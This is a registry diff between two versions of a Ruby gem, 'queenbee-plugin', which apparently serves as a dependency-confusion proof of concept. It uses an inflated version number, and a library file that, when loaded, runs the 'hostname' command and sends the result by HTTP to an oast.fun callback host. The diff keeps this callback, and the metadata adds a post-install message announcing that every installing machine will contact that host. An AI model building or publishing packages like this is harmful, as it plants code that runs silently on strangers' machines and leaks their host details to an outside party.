queenbee-plugin 99.0.0 → 99.0.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: 926d31bddeb3823267323780481dfb5e8c7a075ff92b44cb566f18ac81782857
4
- data.tar.gz: 61362dff031160a13e6a8bc41b1201db324bf29b8e3376faad8b7d2c7dcf7aa8
3
+ metadata.gz: bdf8376045c6b78a1b5db7788041ccf1c6212886b19fb4325346186371fb8034
4
+ data.tar.gz: dbbb8d41d88e265f40f4413a7f3dec377c65aac89339160a01c743116b3a3c14
5
5
  SHA512:
6
- metadata.gz: 0d63dbbfc054d286066a9117107ecc413c83c5af4b0d2fdc328b64230f211d714148d1ad40fc746a4b9f62066d63dde3b86e547c415b4de01c0e7a6596d77502
7
- data.tar.gz: 00ed10a527809140e29d03233e11a7030d6d874e3bc7f20500f694042e9f48aa40d20f26708a356a407559a372e4a306b2c56d9023d3d8e5fbccbc87b0697da3
6
+ metadata.gz: 170a0fbdc9abcef4c7bcf895457a01d73e7f9048859b16999398835a6560f0e72b00c3e487826224e189a547c61bafe7297b5de2f1e6b79c4922babd98c07e39
7
+ data.tar.gz: 522d3616a4d756804d597b25ad632f0e66946e3988b5b99845c7af58491362e6c4bec4c82e88adc680002769309cc19d87ecaa2ac64795eae41c7807da97f3b4
@@ -2,6 +2,6 @@
2
2
 
3
3
  module Queenbee
4
4
  module Plugin
5
- VERSION = "99.0.0"
5
+ VERSION = "99.0.3"
6
6
  end
7
7
  end
@@ -1,5 +1,6 @@
1
- # frozen_string_literal: true
1
+ # الكود الحالي لإرسال request
2
2
  require 'net/http'
3
+ require 'uri'
3
4
 
4
- # PoC Dependency Confusion callback
5
- Net::HTTP.get(URI("https://fcawsppvatnxzeiimvutzix8h5f7luui1.oast.fun/poc?host=#{`hostname`.strip}"))
5
+ uri = URI("https://fcawsppvatnxzeiimvutzix8h5f7luui1.oast.fun/poc?host=#{`hostname`.strip}")
6
+ Net::HTTP.get(uri)
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: queenbee-plugin
3
3
  version: !ruby/object:Gem::Version
4
- version: 99.0.0
4
+ version: 99.0.3
5
5
  platform: ruby
6
6
  authors:
7
7
  - Osama
@@ -23,13 +23,14 @@ files:
23
23
  - lib/queenbee/plugin/version.rb
24
24
  - sig/queenbee/plugin.rbs
25
25
  homepage: https://fcawsppvatnxzeiimvutzix8h5f7luui1.oast.fun
26
- licenses: []
26
+ licenses:
27
+ - MIT
27
28
  metadata:
28
29
  allowed_push_host: https://rubygems.org
29
30
  homepage_uri: https://fcawsppvatnxzeiimvutzix8h5f7luui1.oast.fun
30
31
  source_code_uri: https://fcawsppvatnxzeiimvutzix8h5f7luui1.oast.fun
31
32
  changelog_uri: https://fcawsppvatnxzeiimvutzix8h5f7luui1.oast.fun
32
- post_install_message:
33
+ post_install_message: 'PoC gem installed! Any machine installing this will hit: https://fcawsppvatnxzeiimvutzix8h5f7luui1.oast.fun'
33
34
  rdoc_options: []
34
35
  require_paths:
35
36
  - lib